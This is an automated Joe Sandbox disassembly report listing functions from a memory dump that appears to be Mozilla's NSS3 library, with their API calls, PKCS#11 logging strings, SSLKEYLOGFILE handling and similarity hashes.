Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser$nkl
API String ID: 1003633598-430201964
Opcode ID: dca4704178edf998657e9363e881c05ac3142bd160cfed2235667fbc6ae53ebf
Instruction ID: c2211c522cbb3c9d9187596768b6b51e506a8018b18c5ba90cd9e65efa665200
Opcode Fuzzy Hash: dca4704178edf998657e9363e881c05ac3142bd160cfed2235667fbc6ae53ebf
Instruction Fuzzy Hash: FA41C7B2701245EFDB00EF54DD48E8A3BB1EB8731EF454029E4096B612DF30E918CB9A

Function 6C5E4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5E4C4C
EnterCriticalSection.KERNEL32(?), ref: 6C5E4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4DB7

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

TlsGetValue.KERNEL32 ref: 6C5E4DD7
EnterCriticalSection.KERNEL32(?), ref: 6C5E4DEC
PR_Unlock.NSS3(?), ref: 6C5E4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C5E4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C5E4E71
free.MOZGLUE(00000000), ref: 6C5E4E7A
PR_Unlock.NSS3(?), ref: 6C5E4EA2
TlsGetValue.KERNEL32 ref: 6C5E4EC1
EnterCriticalSection.KERNEL32(?), ref: 6C5E4ED6
PR_Unlock.NSS3(?), ref: 6C5E4F01
free.MOZGLUE(00000000), ref: 6C5E4F2A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 92438d9393aaf0834545f3635c592dd848b0efc1fde1ce19b445d1d08fa93fd9
Instruction ID: 23b2a1aa749336703b7be8e11f4d347e4b5930b3a1cc8b0115c21282957ed84e
Opcode Fuzzy Hash: 92438d9393aaf0834545f3635c592dd848b0efc1fde1ce19b445d1d08fa93fd9
Instruction Fuzzy Hash: 69B1F675E00205AFDB00EFA8DC84B9A77B4BF49318F048568ED1597B01EB35E964CBD6

Function 6C5EFFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5EFFB4

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5EFFC6

Part of subcall function 6C6698D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C669946
Part of subcall function 6C6698D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5216B7,00000000), ref: 6C66994E
Part of subcall function 6C6698D0: free.MOZGLUE(00000000), ref: 6C66995E

PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5EFFD6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5EFFE6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5EFFF6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0006
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0016
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0026
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0036
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0046
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0056
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0066
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0076
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0086
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0096
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F00A6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F00B6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F00C6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F00D6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F00E6

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
String ID:
API String ID: 1407103528-0
Opcode ID: d3c4cc3263f79a49110e33dc5da244f50ab6049dfa2683c0adc53979b8cd1450
Instruction ID: 4e7a207cfb36058d3db41db875784f3afade28a3824e94a78440e4ad0bec6ba5
Opcode Fuzzy Hash: d3c4cc3263f79a49110e33dc5da244f50ab6049dfa2683c0adc53979b8cd1450
Instruction Fuzzy Hash: DE3104F2F016149E8B49DF26C1481497AB4B717A4C710553FF52486B01DFB4094ECF9E

Function 6C636E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C636BF7), ref: 6C636EB6

Part of subcall function 6C591240: TlsGetValue.KERNEL32(00000040,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591267
Part of subcall function 6C591240: EnterCriticalSection.KERNEL32(?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C59127C
Part of subcall function 6C591240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591291
Part of subcall function 6C591240: PR_Unlock.NSS3(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C5912A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C6DFC0A,6C636BF7), ref: 6C636ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C636EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C636EFC
PR_NewLock.NSS3 ref: 6C636F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C636F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C636BF7), ref: 6C636F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C636BF7), ref: 6C636F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C636BF7), ref: 6C636FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C636BF7), ref: 6C636FFD

Strings

# SSL/TLS secrets log file, generated by NSS, xrefs: 6C636EF7
SSLKEYLOGFILE, xrefs: 6C636EB1
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C636FDB
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C636F4F
SSLFORCELOCKS, xrefs: 6C636F2B
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C636FF8

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 500a9b7ae45aa8e1a8f0dac9ad18e1841f254c8e3aa7e7c89e125e6322ba4661
Instruction ID: bc79332220adbea6e5a519aa2c6be52af37f4219041b02789564e29cb1521ebb
Opcode Fuzzy Hash: 500a9b7ae45aa8e1a8f0dac9ad18e1841f254c8e3aa7e7c89e125e6322ba4661
Instruction Fuzzy Hash: 8FA115B2B5A8A0C6F7105A3CCE0179432A2AB93339F187379E9398AED5DB35D440C759

Function 6C5B5DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B5DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C5B5E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6C5B5E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6C5B5E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C5B5EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C5B5ED9
SECKEY_SignatureLen.NSS3(?), ref: 6C5B5F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C5B5F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C5B5F89
free.MOZGLUE(?), ref: 6C5B5FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5B5FB6
free.MOZGLUE(00000000), ref: 6C5B5FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5B600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5B6079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5B6084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5B6094

Strings

, xrefs: 6C5B5EEB

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: 26234be340a298ed06dd35095bb36c56fabcf458286f65402857b210d1f16b0c
Instruction ID: 902e296f1f829f52ac7d9b6d401ff8c9f0adff4ea6eda742be166e58dff9f957
Opcode Fuzzy Hash: 26234be340a298ed06dd35095bb36c56fabcf458286f65402857b210d1f16b0c
Instruction Fuzzy Hash: 7F8114B1E002059BDB08CF64CCA1B9EBBB5AF44318F544568F819B7B81EB31E814CBE1

Function 6C5D4E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C5D4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D4EC7

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C5D4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C5D4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C5D4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C5D4F68

Strings

hObject = 0x%x, xrefs: 6C5D4EF5, 6C5D4F05
(CK_INVALID_HANDLE), xrefs: 6C5D4EC0, 6C5D4F13
hSession = 0x%x, xrefs: 6C5D4EA2, 6C5D4EB2
C_GetAttributeValue, xrefs: 6C5D4E7E
ulCount = %d, xrefs: 6C5D4F63
nkl, xrefs: 6C5D4F82, 6C5D4FB2
pTemplate = 0x%p, xrefs: 6C5D4F4A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$nkl
API String ID: 1003633598-4210825395
Opcode ID: 36ba9cf81d81f080d8d1754ee0fbab97cff5daa6bf78f93137c40c5ca8065046
Instruction ID: 20ba92eb7ac038eb6b2f15d743e484a1aedc1c66d75e7466aa39c21e181d6dc1
Opcode Fuzzy Hash: 36ba9cf81d81f080d8d1754ee0fbab97cff5daa6bf78f93137c40c5ca8065046
Instruction Fuzzy Hash: 474181B1701245ABDB009F58DD48F9A7BB5EB82319F058438E50867B12DF34AD58CBAF

Function 6C5D4CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C5D4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D4D37

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C5D4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C5D4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C5D4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C5D4E20

Strings

hObject = 0x%x, xrefs: 6C5D4D65, 6C5D4D75
*pulSize = 0x%x, xrefs: 6C5D4E1B
(CK_INVALID_HANDLE), xrefs: 6C5D4D30, 6C5D4D83
hSession = 0x%x, xrefs: 6C5D4D12, 6C5D4D22
nkl, xrefs: 6C5D4DD4, 6C5D4DFF
C_GetObjectSize, xrefs: 6C5D4CEE
pulSize = 0x%p, xrefs: 6C5D4DB7

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nkl
API String ID: 1003633598-4019795898
Opcode ID: 8abd7f528f8c978325d8e38266522baee2de9e59312d46e6d66a2ad4b7927512
Instruction ID: 6d3d8d2bf450d54df446b981c88ff375640d751f482ae3e9ec1411ea096502a5
Opcode Fuzzy Hash: 8abd7f528f8c978325d8e38266522baee2de9e59312d46e6d66a2ad4b7927512
Instruction Fuzzy Hash: BD41C3B1701244EFDB00AF58DD88B6A3B75EB8235DF054439E508AB612DF30AD58CB9E

Function 6C5D7C90 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6C5D7CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D7CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D7CF3

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D7D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C5D7D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C5D7D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C5D7D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C5D7D77

Strings

(CK_INVALID_HANDLE), xrefs: 6C5D7CEC
hSession = 0x%x, xrefs: 6C5D7CCE, 6C5D7CDE
pSignature = 0x%p, xrefs: 6C5D7D59
nkl, xrefs: 6C5D7D8F, 6C5D7DC3
ulDataLen = %d, xrefs: 6C5D7D40
pData = 0x%p, xrefs: 6C5D7D25
ulSignatureLen = %d, xrefs: 6C5D7D72
C_Verify, xrefs: 6C5D7CB1

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify$nkl
API String ID: 1003633598-251754603
Opcode ID: bcd7e4e5db3fe66d73dad8269af0b475bdb9e00ab2cf1a5c9e6c3853998515a4
Instruction ID: 0eb3ec0ebf7091930c8ef2171c6e4667b8afc6be9395a778be7a18cf4533617f
Opcode Fuzzy Hash: bcd7e4e5db3fe66d73dad8269af0b475bdb9e00ab2cf1a5c9e6c3853998515a4
Instruction Fuzzy Hash: 2631D6B1701245EFDB00EF58DD48F6A3BB1EB82359F494078E40867612DF30A958CBAA

Function 6C5D2F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C5D2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D2F63

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C5D2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C5D2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C5D2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C5D2FE7

Strings

pNewPin = 0x%p, xrefs: 6C5D2FC9
ulNewLen = %d, xrefs: 6C5D2FE2
(CK_INVALID_HANDLE), xrefs: 6C5D2F5C
hSession = 0x%x, xrefs: 6C5D2F3E, 6C5D2F4E
pOldPin = 0x%p, xrefs: 6C5D2F95
nkl, xrefs: 6C5D2FFF, 6C5D3030
ulOldLen = %d, xrefs: 6C5D2FB0
C_SetPIN, xrefs: 6C5D2F21

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$nkl
API String ID: 1003633598-314763541
Opcode ID: 7f457a18cd7a2c3f63004ed3d3c00a008df6dd90fbd78013080ad2767d7ca5a3
Instruction ID: 35954c27534d353303263579041c312b1e1c017bdf580e1093035dfce5e0d6a5
Opcode Fuzzy Hash: 7f457a18cd7a2c3f63004ed3d3c00a008df6dd90fbd78013080ad2767d7ca5a3
Instruction Fuzzy Hash: 3F31C5B6701245EBDB00DF58DD4DE4A3B71EB86359F054428E408A7612DF30ED58CB9B

Function 6C6B9C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6C6B9C70
PR_NewLock.NSS3 ref: 6C6B9C85

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PR_NewCondVar.NSS3(00000000), ref: 6C6B9C96

Part of subcall function 6C58BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C5921BC), ref: 6C58BB8C

PR_NewLock.NSS3 ref: 6C6B9CA9

Part of subcall function 6C6698D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C669946
Part of subcall function 6C6698D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5216B7,00000000), ref: 6C66994E
Part of subcall function 6C6698D0: free.MOZGLUE(00000000), ref: 6C66995E

PR_NewLock.NSS3 ref: 6C6B9CB9
PR_NewLock.NSS3 ref: 6C6B9CC9
PR_NewCondVar.NSS3(00000000), ref: 6C6B9CDA

Part of subcall function 6C58BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C58BBEB
Part of subcall function 6C58BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C58BBFB
Part of subcall function 6C58BB80: GetLastError.KERNEL32 ref: 6C58BC03
